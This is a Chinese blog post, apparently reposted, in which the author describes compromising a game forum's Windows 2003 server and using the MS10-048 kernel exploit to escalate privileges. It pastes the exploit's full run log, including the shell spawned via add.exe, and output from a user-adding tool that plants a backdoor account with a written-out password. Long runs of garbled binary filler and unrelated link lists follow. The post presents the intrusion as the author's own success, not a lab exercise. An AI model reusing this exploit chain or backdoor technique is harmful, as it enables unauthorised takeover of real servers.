MS10048依旧是Windows 2003 x86 的杀器
今天搞了个wow的游戏论坛,服务器环境是win03 x86+iis6.0+php+mysql。
提权的时候各种无奈,mysql无权限,而且没root,试了几个别的方法都不行,实在没办法的时候,用MS10048试了下,成功了。
Dojibiron by Ronald Huizer, (c) master#h4cker.us [ ] Trying to allocate a page at NULL.
[+] Allocated page at 0x0000000000000000 for 0x0000000000000001
[ ] Bootstrapping kernel resolver.
Module ntoskrnl.exe at 0x0000000000BD0000
Base of driver: 0xFFFFF80001000000
[+] Success.
[ ] Resolving PsReferencePrimaryToken
[+] Success: 0xFFFFF8000129FE50
[ ] Resolving PsInitialSystemProcess
[+] Success: 0xFFFFF800011D1FB0
[ ] Resolving PsLookupProcessByProcessId
[+] Success: 0xFFFFF80001288BC0
[ ] Resolving PsDereferencePrimaryToken
[+] Success: 0xFFFFF80001311B40
[+] Handle table retrieval succeeded.
Userspace handle table: 0x00000000006B0000
Kernelspace handle table: 0xFFFFF97FF7990000
Handle table entries: 1024
[ ] Allocating fake HEAD page.
[+] Allocated page at 0x0000000004000000 for 0x00000000040001FF
[ ] Setting up CBT filter hook.
[+] Success.
[ ] Creating evil window
[+] Success.
[ ] Destroyed handle at: 0xFFFFF97FF7990FC0
pHead: 0xFFFFF97FF906BA00
pOwner: 0xFFFFFA80000E8D80
bType: 0x01 - TYPE_WINDOW
bFlags: 0x00 -
wUniq: 0x0004
[ ] Trigger handle at: 0xFFFFF97FF7995AC0
pHead: 0xFFFFF97FF90900A0
pOwner: 0xFFFFFA80000E8D80
bType: 0x01 - TYPE_WINDOW
bFlags: 0x00 -
wUniq: 0x0003
[ ] Writing pool addr to: 0xFFFFF97FF7990F7F ~ MS10_048 X64 EXP ~ Need a girl to love QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
11111111110101010101111010101110101010101010101010101010111100000000000110
110101010101010101010101010111100000000000110
111100000000000110
0000110
[ ] Checking the success flag.
[+] Set to 2 exploit half succeeded
[ ] Destroying trigger window
pHead: 0x00000000000003CA
pOwner: 0x0000000000000000
bType: 0x00 - TYPE_FREE
bFlags: 0x00 -
wUniq: 0x0004
[ ] Spawning half a shell...
Command: D:\RECYCLER\add.exe
[+] Enjoy!
========================================== Api Add User Made By Cond0r 2011.3.20
Adduser.exe UserName PassWord Group
==========================================
User List: --> 7ksf
--> ASPNET
--> Guestasdfa
--> IUSR_NJXW-12-5-2
--> IWAM_NJXW-12-5-2
--> SUPPORT_388945a0 Group List: --> Administrators
--> Backup Operators
--> Distributed COM Users
--> Guests
--> Network Configuration Operators
--> Performance Log Users
--> Performance Monitor Users
--> Power Users
--> Print Operators
--> Remote Desktop Users
--> Replicator
--> Users
--> HelpServicesGroup
--> IIS_WPG
--> TelnetClients SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !! 利用api加用户工具,成功添加cond0r密码为123!@#asdASD的账户
MS10048依旧是Windows 2003 x86 的杀器的更多相关文章
- Windows 2003 FastCgi安装环境
Windows 2003 IIS+PHP5.4.3 安装教程 一.准备相关组件 安装前,先安装IIS. 1.安装FastCgi for IIS6 Fastcgi官方网址是:http://www.iis ...
- Windows 2003上 SaltStack/Salt 和 psutil 可能存在的问题及解决
今天把salt安装在windows 2003上,发现无法启动,随之而来的是一个有一个的坑,让我们一起逐个排查. 问题一(salt无法启动) salt无法启动,错误结果如图:
- Windows 2003】利用域&&组策略自动部署软件
Windows 2003]利用域&&组策略自动部署软件 转自 http://hi.baidu.com/qu6zhi/item/4c0fa100dc768613cc34ead0 ==== ...
- 使用docker-compose 大杀器来部署服务 上
使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...
- Windows 2003 Server 标准版启动问题解决(资源转贴)
维护的系统之一是部署在windows2003 Server标准版的服务器上,可能是由于某个应用问题,导致远程重启失败,害得我在机房呆了一早晨,可算是够折腾的.最后按照官方文档解决,刚放文档地址是:ht ...
- 使用docker-compose 大杀器来部署服务 上(转)
使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...
- 利用pentestbox打造ms17-010移动"杀器"
本文首发Freebuf,属原创奖励计划,未经许可禁止转载. 链接:http://www.freebuf.com/articles/system/132274.html 一. 前言 前段时间Shadow ...
- [转]使用docker-compose 大杀器来部署服务 上
本文转自:https://www.cnblogs.com/neptunemoon/p/6512121.html 使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker ...
- 使用docker-compose 大杀器来部署服务
使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...
随机推荐
- iOS 在使用UINavigationController和TabBarController时view的frame
可能是以前记错了,总认为在ios6上使用了UINavigationController或者TabBarController会因为多了bar而影响子controller的view的frame大小.今天在 ...
- Java for LeetCode 200 Number of Islands
Given a 2d grid map of '1's (land) and '0's (water), count the number of islands. An island is surro ...
- JavaScript设计模式 - 迭代器模式
迭代器模式是指提供一种方法顺序访问一个聚合对象中的各个元素,而又不需要暴露该对象的内部表示. 迭代器模式可以把迭代的过程从业务逻辑中分离出来,在使用迭代器模式之后,即使不关心对象的内部构造,也可以按顺 ...
- jquery去掉或者替换字符,设置指定options为selected状态
<html> <body> <div><select id="queryYear"> <opt ...
- VS 高亮显示不带后缀的C++头文件
工具-选项-文本编辑器-文件扩展名-勾选“将无扩展名文件映射到(M)” Microsoft Visual C++
- android中src和background区别
background会根据ImageView组件给定的长宽进行拉伸,而src就存放的是原图的大小,不会进行拉伸.src是图片内容(前景),bg是背景,可以同时使用. 此外:scaleType只对src ...
- Android 如何让EditText不自动获取焦点
解决之道:在EditText的父级控件中找一个,设置成 android:focusable="true" android:focusableInTouchMode=&quo ...
- python file.tell() 在windows下需要注意的地方
顺便记一下,'rba'模式是非法的...
- h5 canvas 画图
h5 canvas 画图 <!DOCTYPE html> <html lang="en"> <head> <meta charset=&q ...
- ubuntu apt-get 总结 install xxx -d能下载安装包(含依赖)不安装_和卸载(转载)
[举例] 目前常用的 ========== *更新本机中的数据库缓存: sudo apt-get update *查找包含部分关键字的软件包: sudo apt-cache search <你要 ...